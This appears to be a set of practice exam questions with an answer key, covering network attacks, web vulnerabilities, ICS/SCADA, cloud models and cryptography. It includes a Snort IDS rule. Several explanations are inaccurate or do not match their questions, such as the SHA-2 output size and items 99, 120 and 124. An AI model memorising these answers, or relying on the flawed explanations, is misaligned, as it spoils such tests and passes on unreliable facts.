Which of the following types of attacks are usually used as part of a man-in-the-middle attack?
A. Brute force
B. Spoofing
C. DDOS
D. Tailgating
B. Spoofing
Explanation
OBJ-4.1: A man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe they are directly communicating with each other. One example of a MITM attack is active eavesdropping. The attacker makes independent connections with the victims and relays messages between them to make them believe they are talking directly to each other over a private connection. In fact, the entire conversation is controlled by the attacker. The attacker must intercept all relevant messages passing between the two victims and inject new ones. Spoofing is often used to inject the attacker into the conversation path between the two parties.
91
An ethical hacker has been hired to conduct a physical penetration test of a company. During the first day of the test, the ethical hacker dresses up like a plumber and waits in the building's main lobby until an employee goes through the main turnstile. As soon as the employee enters his access number and proceeds to go through the turnstile, the ethical hacker follows them through the access gate. What type of attack did the ethical hacker utilize to access the restricted area of the building?
A. Mantrap
B. Tailgating
C. Shoulder surfing
D. Social engineering
B. Tailgating
Explanation
OBJ-4.2: Based on the description, the ethical hacker conducted a very specialized type of social engineering attack known as tailgating. Sometimes on a certification exam, there are two correct answers, but one is more correct. This question is an example of that concept. Tailgating involves someone who lacks the proper authentication following an employee into a restricted area. Social engineering uses deception to manipulate individuals into divulging confidential or personal information that may be used for fraudulent purposes. Shoulder surfing is a type of social engineering technique used to obtain personal identification numbers (PINs), passwords, and other confidential data by looking over the victim's shoulder.
92
You are conducting a penetration test against an organization. You have captured the legitimate authentication handshake between a client and a server. Later in the day, you retransmit that session while spoofing your MAC address to that of the client. Which of the following exploits are you using?
A. Relay attack
B. Fragementation attack
C. Replay attack
D. Downgrade attack
C. Replay attack
Explanation
OBJ-4.1: A replay attack repeats a legitimate transmission in a malicious context. For example, a user might send their authentication information to a client or system; the attacker who eavesdrops on this communication can use the authentication in a later transmission, essentially impersonating the victim. In wireless networking, replaying transmissions can be used to enable several different attacks. Do not confuse a replay attack with a relay attack. In a replay attack, a legitimate network packet or frame is retransmitted repeatedly. In a relay attack, an attacker inserts themselves man-in-the-middle style between two devices, intercepting and forwarding traffic between them.
93
Richard attempted to visit a website and received a DNS response from the DNS cache server pointing to the wrong IP address. Which of the following attacks has occurred?
A. DNS brute forcing
B. ARP spoofing
C. DNS poisoning
D. MAC spoofing
C. DNS poisoning
Explanation
OBJ-4.1: DNS poisoning (also known as DNS cache poisoning or DNS spoofing) is a type of attack which uses security gaps in the Domain Name System (DNS) protocol to redirect internet traffic to malicious websites. MAC spoofing is a technique for changing a factory-assigned Media Access Control (MAC) address of a network interface on a networked device. ARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network using layer 2 address information. DNS brute-forcing is used to check for wildcard entries using a dictionary or wordlist. This technique is used when a DNS zone transfer is not allowed by a system.
94
You are reviewing a rule within your organization's IDS. You see the following output:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any
msg: “BROWSER-IE Microsoft Internet Explorer
CacheSize exploit attempt”;
flow: to_client,established;
file_data;
content:"recordset"; offset:14; depth:9;
content:".CacheSize"; distance:0; within:100;
pcre:"/CacheSize\s*=\s*/";
byte_test:10,>,0x3ffffffe,0,relative,string;
max-detect-ips drop, service http;
reference:cve,2016-8077;
classtype: attempted-user;
sid:65535;rev:1;
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based on this rule, which of the following malicious packets would this IDS alert on?
A. An malicious inbound TCP packet
B. Any malicious outbound packets
C. An malicious outbound TCP packet
D. Any malicious inbound packets
A. An malicious inbound TCP packet
Explanation
OBJ-4.5: The rule header is set to alert only on TCP packets based on this IDS rule's first line. The flow condition is set as "to_client,established," which means that only inbound traffic will be analyzed against this rule and only inbound traffic for connections that are already established. Therefore, this rule will alert on an inbound malicious TCP packet only when the packet matches all the conditions listed in this rule. This rule is an example of a Snort IDS rule. For the exam, you do not need to create your own IDS rules, but you should be able to read them and pick out generic content like the type of protocol covered by the signature, the port be analyzed, and the direction of flow.
95
During a business trip, Bobby connects to the hotel's wireless network to send emails to some of his clients. The next day, Bobby notices that additional emails have been sent out from his account without consent. Which of the following protocols was MOST likely used to compromise Bobby's email password utilizing a network sniffer?
A. SSL
B. HTTP
C. TFTP
D. DNS
B. HTTP
Explanation
OBJ-4.1: HTTP is an unsecured protocol, and information is passed without encryption. If the user signed into their webmail over HTTP instead of HTTPS, a network sniffer could compromise the username and password. Additionally, if the user was using an email client, then the SMTP connection could have been compromised, but since that wasn't an option in this question, we must assume Bobby used a webmail client over HTTP instead.
96
An independent cybersecurity researcher has contacted your company to prove a buffer overflow vulnerability exists in one of your applications. Which technique would have been most likely to identify this vulnerability in your application during development?
A. Dynamic code analysis
B. Pair programming
C. Manual Peer Review
D. Static code analysis
D. Static code analysis
Explanation
OBJ-5.1: Buffer overflows are most easily detected by conducting a static code analysis. Manual peer review or pair programming methodologies might have been able to detect the vulnerability. Still, they do not have the same level of success as a static code analysis using proper tools. DevSecOps methodology would also improve the likelihood of detecting such an error but still rely on human-to-human interactions and human understanding of source code to detect the fault. Dynamic code analysis also may have detected this if the test found exactly the right condition. Still, again, a static code analysis tool is designed to find buffer overflows more effectively.
97
Tony works for a company as a cybersecurity analyst. His company runs a website that allows public postings. Recently, users have started complaining about the website having pop-up messages asking for their username and password. Simultaneously, your security team has noticed a large increase in the number of compromised user accounts on the system. What type of attack is most likely the cause of both of these events?
A. SQL injection
B. Cross-site scripting
C. Cross-site request forgery
D. Rootkit
B. Cross-site scripting
Explanation
OBJ-5.2: This scenario is a perfect example of the effects of a cross-site scripting (XSS) attack. If your website's HTML code does not perform input validation to remove scripts that may be entered by a user, then an attacker can create a popup window that collects passwords and uses that information to compromise other accounts further. A cross-site request forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. An XSS will allow an attacker to execute arbitrary JavaScript within the victim's browser (such as creating pop-ups). A CSRF would allow an attack to induce a victim to perform actions they do not intend to perform. A rootkit is a set of software tools that enable an unauthorized user to control a computer system without being detected. SQL injection is the placement of malicious code in SQL statements via web page input. None of the things described in this scenario would indicate a CSRF, rootkit, or SQL injection.
98
A web developer wants to protect their new web application from a man-in-the-middle attack. Which of the following controls would best prevent an attacker from stealing tokens stored in cookies?
A. Forcing the use of TLS for the web application
B. Forcing the use of SSL for the web application
C. Setting the secure attribute on the cookie
D. Hashing the cookie value
C. Setting the secure attribute on the cookie
Explanation
OBJ-5.1: When a cookie has the Secure attribute, the user agent includes the cookie in an HTTP request only if transmitted over a secure channel (typically HTTPS). Although seemingly useful for protecting cookies from active network attackers, the Secure attribute protects only the cookie’s confidentiality. Forcing the web application to use TLS or SSL does not force the cookie to be sent over TLS/SSL, so you still need to set the cookie's Secure attribute. Hashing the cookie provides the cookie's integrity, not confidentiality; therefore, it will not solve the issue presented by this question.
99
You have just conducted an automated vulnerability scan against a static webpage without any user input fields. You have been asked to adjudicate the scanner's findings in the automated report. Which of the following is MOST likely to be a false positive?
A. Missing secure flag for the site's cookies
B. Version disclosure of server information
C. Supports weak cipher suites
D. Unencrypted transfer of data
B. Version disclosure of server information
Explanation
OBJ-5.1: The disclosure of internal server information, such as its version, is a common vulnerability on both static webpages and dynamic webpages. This disclosure can occur during banner grabber or by reviewing the source course of the webpage.
100
You are conducting threat hunting for an online retailer. Upon analyzing their web server, you identified that a single HTML response returned as 45 MB in size, but an average response is normally only 275 KB. Which of the following categories of potential indicators of compromise would you classify this as?
A. Beaconing
B. Data exfiltration
C. Introduction of new accounts
D. Unauthorized privilege
B. Data exfiltration
Explanation
OBJ-5.1: If attackers use SQL injection to extract data through a Web application, the requests issued by them will usually have a larger HTML response size than a normal request. For example, if the attacker extracts the full credit card database, then a single response for that attacker might be 20 to 50 MB, where a normal response is only 200 KB. Therefore, this scenario is an example of a data exfiltration indicator of compromise. Based on the scenario, there is no evidence that a user is conducting a privilege escalation or using unauthorized privileges. There is also no evidence of a new account having been created or beaconing occurring over the network.
101
What is a common Service Oriented Architecture Protocol (SOAP) vulnerability?
A. Cross-site scripting
B. SQL injection
C. Xpath injection
D. XML denial of service issues
D. XML denial of service issues
Explanation
OBJ-5.1: An XML denial of service (or XML bomb) attempts to pull in entities recursively in a defined DTD and explode the amount of memory used by the system until a denial of service condition occurs. Service-Oriented Architecture (SOA) is an architectural paradigm, and it aims to achieve a loose coupling amongst interacting distributed systems. SOA is used by enterprises to efficiently and cost-effectively integrate heterogeneous systems. However, SOA is affected by several security vulnerabilities, affecting the speed of its deployment in organizations. SOA is most commonly vulnerable to an XML denial of service. While the other options could be used as part of an attack on SOAP, the SOAP message itself is formatted as an XML document making an XML denial of service the most common vulnerability. While SOAP requests are vulnerable to SQL injections, this occurs by submitting a parameter as a morphed SQL query that can authenticate or reveal sensitive information as an attack on the underlying SQL. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XPath Injections operate on web sites that use user-supplied information to construct an XPath query for XML data.
102
Which of the following a characteristic of a Blind SQL Injection vulnerability?
A. Administrator of the vulnerable application cannot see the request to the webserver
B. Application properly filters the user input but it is still vulnerable to code injection in a blind attack
C. Administrator of the affected application does not see an error message during a successful attaDck
D. An attacker cannot see any of the display errors with information about the injection during a blind attack
D. An attacker cannot see any of the display errors with information about the injection during a blind attack
Explanation
OBJ-5.3: Blind SQL injection is a type of SQL injection attack that asks the database true or false questions and determines the answer based on the application's response. This attack is often used when the web application is configured to show generic error messages but has not mitigated the code that is vulnerable to SQL injection.
103
A factory worker suspects that a legacy workstation is infected with malware. The workstation runs Windows XP and is used as part of an ICS/SCADA system to control industrial factory equipment. The workstation is connected to an isolated network that cannot reach the internet. The workstation receives the patterns for the manufactured designs through a USB drive. A technician is dispatched to remove the malware from this workstation. After its removal, the technician provides the factory worker with a new USB drive to move the pattern files to the workstation. Within a few days, the factory worker contacts the technician again to report the workstation appears to be reinfected with malware. Which of the following steps did the technician MOST likely forget to perform to prevent reinfection?
A. Quarantine the infected system
B. Disable System Restore (in Windows)
C. Remediate the infected systems
D. Update the anti-malware solution
E. Enable System Restore and create a restore point (in Windows)
F. Identify and research malware symptoms
D. Update the anti-malware solution
Explanation
OBJ-7.2: Since the workstation is isolated from the internet, the anti-malware solution will need to be manually updated to ensure it has the latest virus definitions. Without the latest virus definitions, the system can easily become reinfected.
104
Dion Training Solutions has just installed a backup generator for their offices that use SCADA/ICS for remote monitoring of the system. The generator’s control system has an embedded cellular modem that periodically connects to the generator’s manufacturer to provide usage statistics. The modem is configured for outbound connections only, and the generator has no data connection with any of Dion Training’s other networks. The manufacturer utilizes data minimization procedures and uses the data to recommend preventative maintenance service and ensure maximum uptime and reliability by identifying parts that need to be replaced. Which of the following cybersecurity risk is being assumed in this scenario?
A. There is minimal risk being assumed since the cellular modem is configured for outbound connections only
B. There is high risk being assumed since the presence of a cellular modem could allow an attacker to remotely disrupt the generator
C. There is a critical risk being assumed since the cellular modem represents a threat to the enterprise network if an attacker exploits the generator and then pivots to the production environment
D. There is medium risk being assumed since the manufacturer could use the data for purposes other than originally agreed upon
A. There is minimal risk being assumed since the cellular modem is configured for outbound connections only
Explanation
OBJ-7.2: There is minimal risk being assumed in this scenario since the cellular modem is configured for outbound connections only. This also minimizes the risk of an attacker gaining remote access to the generator. The generator is logically and physically isolated from the rest of the enterprise network, so even if an attacker could exploit the generator, they could not pivot into the production network. While there is a risk of the manufacturer using the data for purposes other than originally agreed upon, this is a minimal risk due to the manufacturer’s data minimization procedures and the type of data collected. Should the manufacturer choose to use usage statistics about the generator for some other purpose, it would have a negligible impact on the company since it does not contain any PII or proprietary company data.
105
An analyst reviews the logs from the network and notices that there have been multiple attempts from the open wireless network to access the networked HVAC control system. The open wireless network must remain openly available so that visitors can access the internet. How can this type of attack be prevented from occurring in the future?
A. Implement a VLAN to separate the HVAC control system from the open wireless network
B. Install an IDS to protect the HVAC system
C. Enable NAC on the open wireless network
D. Enable WPA2 security on the open wireless network
A. Implement a VLAN to separate the HVAC control system from the open wireless network
Explanation
OBJ-7.2: A VLAN is useful to segment out network traffic to various parts of the network and stop someone from the open wireless network from logging to the HVAC controls. By utilizing NAC, each machine connected to the open wireless network could be checked for compliance and determine if it is a 'known' machine, but they would still be given access to the entire network. Also, since this is a publicly usable network, using NAC could prevent users from accessing all the network features. An IDS would be a good solution to detect the attempted logins, but it won't prevent them. Instead, an IPS would be required to prevent logins.
106
Which of the following exploitation frameworks contain plugins that can trigger buffer overflows in SCADA systems, such as /exploit/windows/scada/daq_factory_bof that can trigger a stack overflow by sending excessive requests to a service port on the system?
A. Nessus
B. Androzer
C. Metasploit
D. Nikto
C. Metasploit
Explanation
OBJ-7.2: Metasploit is an open-source exploitation framework that uses plugins to add different exploits and functionalities. They are always in the form of a directory structure, like /exploit/windows/scada/daq_factory_bof. This represents the plugin type (exploit), the operating system involved (windows), the service/program (scada), and the specific exploit (daq_factory_bof). If you see this format in a question, the answer is most likely Metasploit related.
107
Due to a global pandemic, your company decides to implement a telework policy for its employees. Unfortunately, the company doesn't have enough time to issue laptops and smartphones to each employee. The Chief Information Officer (CIO) has decided to allow employees to use their own laptops and smartphones when conducting their work from home. Which of the following policies and technology should be implemented to provide security guidance to employees on the use of these devices? (Select TWO)
A. EULA
B. BYOD
C. COPE
D. MDM
E.DRM
F. ACL
B. BYOD
D. MDM
Explanation
OBJ-7.1: The Bring Your Own Device (BYOD) policy is a security framework used to facilitate the use of personally-owned devices to access corporate networks and data. Mobile Device Management (MDM) is a class of management software designed to apply security policies to the use of mobile devices in the enterprise. Since the employees will be using their own laptops and smartphones, the company will need a good BYOD policy to provide security guidance. The company may also implement and install MDM across the employee's devices to better secure the BYOD devices if they give the company permission.
108
The local electric power plant contains both business networks and ICS/SCADA networks to control their equipment. Which technology should the power plant’s security administrators look to implement first as part of configuring better defenses for the ICS/SCADA systems?
A. Intrusion prevention system
B. Anti-virus software
C. Automated patch deployment
D. Log consolidation
A. Intrusion prevention system
Explanation
OBJ-7.2: Since this question is focused on the ICS/SCADA network, the best solution would be implementing an Intrusion Prevention System. ICS/SCADA machines utilize very specific commands to control the equipment and to prevent malicious activity. You could set up strict IPS rules to prevent unknown types of actions from being allowed to occur. Log consolidation is a good idea, but it won't prevent an issue and therefore isn't the most critical thing to add first. Automated patch management should not be conducted, as ICS/SCADA systems must be tested before conducting any patches. Often, patches will break ICS/SCADA functionality. Anti-virus software may or may not be able to run on the equipment, as well, since some ICS/SCADA systems often do not rely on standard operating systems like Windows.
109
Which of the following is NOT considered part of the Internet of Things?
A. SCADA
B. ICS
C. Smart television
D. Laptop
D. Laptop.
Explanation
OBJ-7.2: Supervisory control and data acquisition (SCADA) systems, industrial control systems (ICS), internet-connected televisions, thermostats, and many other things examples of devices classified as the Internet of Things (IoT). A laptop would be better classified as a computer or host than part of the Internet of Things. The Internet of things (IoT) is a system of interrelated computing devices, mechanical and digital machines provided with unique identifiers (UIDs), and the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction.
110
Which of the following type of threats did the Stuxnet attack rely on to cross an airgap between a business and an industrial control system network?
A. Directory traversal
B. Cross-site scripting
C. Removable media
D. Session hijacking
C. Removable media
Explanation
OBJ-7.2: Airgaps are designed to remove connections between two networks to create a physical segmentation between them. The only way to cross an airgap is to have a physical device between these systems, such as using a removable media device to transfer files between them. A directory traversal is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server's root directory. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. A session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server. A directory traversal, cross-site scripting, or session hijacking attack cannot by itself cross an airgap.
111
Your company is adopting a new BYOD policy for tablets and smartphones. Which of the following would allow the company to secure the sensitive information on personally owned devices and the ability to remote wipe corporate information without the user's affecting personal data?
A. Face ID
B. Long and complex passwords
C. Touch ID
D. Containerization
D. Containerization
Explanation
OBJ-7.1: Containerization is the logical isolation of enterprise data from personal data while co-existing in the same device. The major benefit of containerization is that administrators can only control work profiles that are kept separate from the user’s personal accounts, apps, and data. This technology basically creates a secure vault for your corporate information. Highly targeted remote wiping is supported with most container-based solutions.
Question 112:
112
Which of the following types of digital forensic investigations is most challenging due to the on-demand nature of the analyzed assets?
A. Employee workstations
B. Cloud services
C. Mobile devices
D. On-premise servers
B. Cloud services
Explanation
OBJ-8.1: The on-demand nature of cloud services means that instances are often created and destroyed again, with no real opportunity for forensic recovery of any data. Cloud providers can mitigate this to some extent by using extensive logging and monitoring options. A CSP might also provide an option to generate a file system and memory snapshots from containers and VMs in response to an alert condition generated by a SIEM. Employee workstations are often the easiest to conduct forensics on since they are a single-user environment for the most part. Mobile devices have some unique challenges due to their operating systems, but good forensic tool suites are available to ease the forensic acquisition and analysis of mobile devices. On-premise servers are more challenging than a workstation to analyze, but they do not suffer from the same issues as cloud-based services and servers.
113
Your company has decided to move all of its data into the cloud. Your company is concerned about the privacy of its data due to some recent data breaches that have been in the news. Therefore, they have decided to purchase cloud storage resources that will be dedicated solely for their use. Which of the following types of clouds is your company using?
A. Hybrid
B. Private
C. Public
D. Community
B. Private
Explanation
OBJ-8.1: Private cloud refers to a cloud computing model where IT services are provisioned over private IT infrastructure for the dedicated use of a single organization. A private cloud is usually managed via internal resources. The terms private cloud and virtual private cloud (VPC) are often used interchangeably.
114
Which of the following are valid concerns when migrating to a serverless architecture? (SELECT THREE)
A. Protection of endpoint security
B. Management of VPC offerings
C. Dependency on the cloud service provider
D. Limited disaster recovery options
E. Patching of the backend infrastructure
F. Management of physical servers
A. Protection of endpoint security
C. Dependency on the cloud service provider
D. Limited disaster recovery options
Explanation
OBJ-8.1: Serverless is a modern design pattern for service delivery. With serverless, all the architecture is hosted within a cloud, but unlike “traditional” virtual private cloud (VPC) offerings, services such as authentication, web applications, and communications aren’t developed and managed as applications running on servers located within the cloud. Instead, the applications are developed as functions and microservices, each interacting with other functions to facilitate client requests. There is a heavy dependency on the cloud service provider in a serverless architecture system since all of the back-end infrastructure's patching and management functions are done by them. An organization using such an architecture would still need to prevent compromise of the user endpoints, though the cloud service provider does not manage these. Another concern with serverless architectures is that there are limited options for disaster recovery if service provisioning fails. Patching of backend infrastructure is eliminated because the infrastructure is eliminated with serverless architectures. Once migration is complete, there are no physical servers to manage, which reduces the workload on your system administration teams.
115
Your organization has recently migrated to a SaaS provider for its enterprise resource planning (ERP) software. Before this migration, a weekly port scan was conducted to help validate the on-premise systems' security. Which of the following actions should you take to validate the security of the cloud-based solution?
A. Utilize a different scanning tool
B. Utilize vendor testing and audits
C. Utilize a third-party contractor to conduct the scans
D. Utilize a VPN to scan inside the vendor’s security perimeter
B. Utilize vendor testing and audits
Explanation
OBJ-8.1: The best option is to utilize vendor testing and audits in a cloud-based environment. Most SaaS providers will not allow customers to conduct their own port scans or vulnerability scans against the SaaS service. This means you cannot scan using a VPN connection, utilize different scanning tools, or hire a third-party contractor to scan on your behalf.
116
What type of cloud service would provide you with a complete development and deployment environment in the cloud for you to create customized cloud-based apps?
A. PaaS
B. IaaS
C. SaaS
D. DaaS
A. PaaS
Explanation
OBJ-8.1: Platform as a service (PaaS) is a complete development and deployment environment in the cloud, with resources that enable you to deliver everything from simple cloud-based apps to sophisticated, cloud-enabled enterprise applications. You purchase the resources you need from a cloud service provider on a pay-as-you-go basis and access them over a secure Internet connection. PaaS includes infrastructure (servers, storage, and networking) and middleware, development tools, business intelligence (BI) services, database management systems, and more. PaaS allows you to avoid the expense and complexity of buying and managing software licenses, the underlying application infrastructure and middleware, container orchestrators, or the development tools and other resources. You manage the applications and services you develop, and the cloud service provider typically manages everything else.
117
Which of the following is the MOST dangerous type of threat when using virtualization?
A. Virtual NIC duplication
B. VM escape
C. Rogue VM
D. VM sprawl
B. VM escape
Explanation
OBJ-8.1: VM escape refers to malware running on a guest OS jumping to another guest or the host. As with any other software type, it is vital to keep the hypervisor code up-to-date with patches for critical vulnerabilities. VM escape is the biggest threat to virtualized systems.
118
Which cloud computing concept is BEST described as focusing on replacing the hardware and software required when creating and testing new applications and programs from a customer's environment with cloud-based resources?
A. PaaS
B. SaaS
C. IaaS
D. SECaaS
A. PaaS
Explanation
OBJ-8.1: Platform as a Service (PaaS) provides the end-user with a development environment without all the hassle of configuring and installing it themselves. If you want to develop a customized or specialized program, PaaS helps reduce the development time and overall costs by providing a ready to use platform.
119
Which of the following hashing algorithms results in a 128-bit fixed output?
A. MD-5
B. SHA-1
C. RIPEMD
D. SHA-2
A. MD-5
Explanation
OBJ-9.1: MD-5 creates a 128-bit fixed output. SHA-1 creates a 160-bit fixed output. SHA-2 creates a 256-bit fixed output. RIPEMD creates a 160-bit fixed output.
120
A company needs to implement stronger authentication by adding an authentication factor to its wireless system. The wireless system only supports WPA with pre-shared keys, but the backend authentication system supports EAP and TTLS. What should the network administrator implement?
A. PKI with user authentication
B. 802.1x using EAP with MSCHAPv2
C. WPA2 with a complex shared key
D. MAC address filtering with IP filtering
B. 802.1x using EAP with MSCHAPv2
Explanation
OBJ-9.1: Since the backend uses a RADIUS server for back-end authentication, the network administrator can install 802.1x using EAP with MSCHAPv2 for authentication.
121
Which of the following cryptographic algorithms is classified as asymmetric?
A. AES
B. RC4
C. Diffie-Hellman
D. Blowfish
C. Diffie-Hellman
Explanation
OBJ-9.1: The Diffie-Hellman (DH) is used to exchange cryptographic keys over a public channel securely and was one of the first public-key protocols. As a public-key protocol, it relies on an asymmetric algorithm. AES, RC4, and Blowfish are all symmetric algorithms.
122
A company has recently experienced a data breach and has lost nearly 1 GB of personally identifiable information about its customers. You have been assigned as part of the incident response team to identify how the data was leaked from the network. Your team has conducted an extensive investigation, and so far, the only evidence of a large amount of data leaving the network is from the email server. One user has sent numerous large attachments out of the network to their personal email address. Upon closer inspection, those emails only contain pictures of that user’s recent trip to Australia. What is the most likely explanation for how the data left the network?
A. Steganography was used to hide the leaked data inside the user's photos
B. The files were downloaded from home while connected to the corporate VPN
C. The data was hashed and then emailed to their personal email account
D. The data was encrypted and emailed it to their spouse's email account
A. Steganography was used to hide the leaked data inside the user's photos
Explanation
OBJ-9.1: The most likely explanation is that the user utilized steganography to hide the leaked data inside their trip photos. Steganography is the process of hiding one message inside another. By hiding the customer’s information within the digital photos, the incident response team would not see the data being hidden without knowing to look for it inside the seemingly benign pictures from the trip. The scenario did not mention whether or not the user connected to the corporate VPN from their home, and the company should log all VPN connections, so this is not the correct answer. Additionally, the user could not hash the data and email it to themselves without losing the information since hashes are a one-way algorithm. Therefore, even if the user had the hash value, they still would not have the customers' personal information. Finally, according to the scenario, the user’s email showed no evidence of encrypted files being sent.
123
You are working for a government contractor who requires all users to use a PIV device when sending digitally signed and encrypted emails. Which of the following physical security measures is being implemented?
A. Smart card
B. Key fob
C. Biometric reader
D. Cable lock
A. Smart card
Explanation
OBJ-9.1: A smart card is used in applications that need to protect personal information and/or deliver fast, secure transactions, such as transit fare payment cards, government, and corporate identification cards, documents such as electronic passports and visas, and financial payment cards. Often, smart cards are used as part of a multifactor authentication system where the smart card and a PIN needs to be entered for system authentication to occur.
124
Frank and John have started a secret club together. They want to ensure that when they send messages to each other, they are truly unbreakable. What encryption key would provide the STRONGEST and MOST secure encryption?
A. DES with a 56-bit key
B. AES with a 256-bit key
C. ECC with a 256-bit key
D. Randomized one-time use pad
D. Randomized one-time use pad
Explanation
OBJ-9.1: The only truly unbreakable encryption is one that uses a one-time use pad. This ensures that every message is encrypted with a different shared key that only the two owners of the one-time use pad would know. This technique ensures that there is no pattern in the key for an attacker to guess or find. Even if one of the messages could be broken, all of the other messages would remain secure since they use different keys to encrypt them. Unfortunately, one-time use pads require that two identical copies of the pad are produced and distributed securely before they can be used. DES and AES both rely on a single shared secret key, making it vulnerable to attack. DES has already been broken, while AES remains unbroken (today). With enough time and computing power, though, an AES key could be discovered. RSA is also vulnerable to attack with enough time and computing power.
125
Keith wants to validate the application file that he downloaded from the vendor of the application. Which of the following should he compare against the file to verify the integrity of the downloaded application?
A. File size and file creation date
B. MD5 or SHA1 hash digest of the file
C. Private key of the file
D. Public key of the file
B. MD5 or SHA1 hash digest of the file
Explanation
OBJ-9.1: Keith should conduct a hash of the downloaded file and compare it against the MD5 hash digest listed on the server of this file. This file needs to be a verifiable MD5 hash file to validate the file integrity has not been compromised during the download. This is an important step to ensure the file was not modified in transit during the download. The other options are insufficient to guarantee the integrity of the downloaded file since integrity checking relies on comparing hash digests. A public or private key would not be assigned solely to a single file, nor do they provide integrity on their own. Public and private keys are used to ensure data confidentiality, whereas a hash digest ensures integrity. The file size and file creation date are additional forms of metadata that could help validate a file's integrity. Still, they of a much lower quality and trust factor than using a hash digest. Therefore MD5 or SHA1 is a better choice.
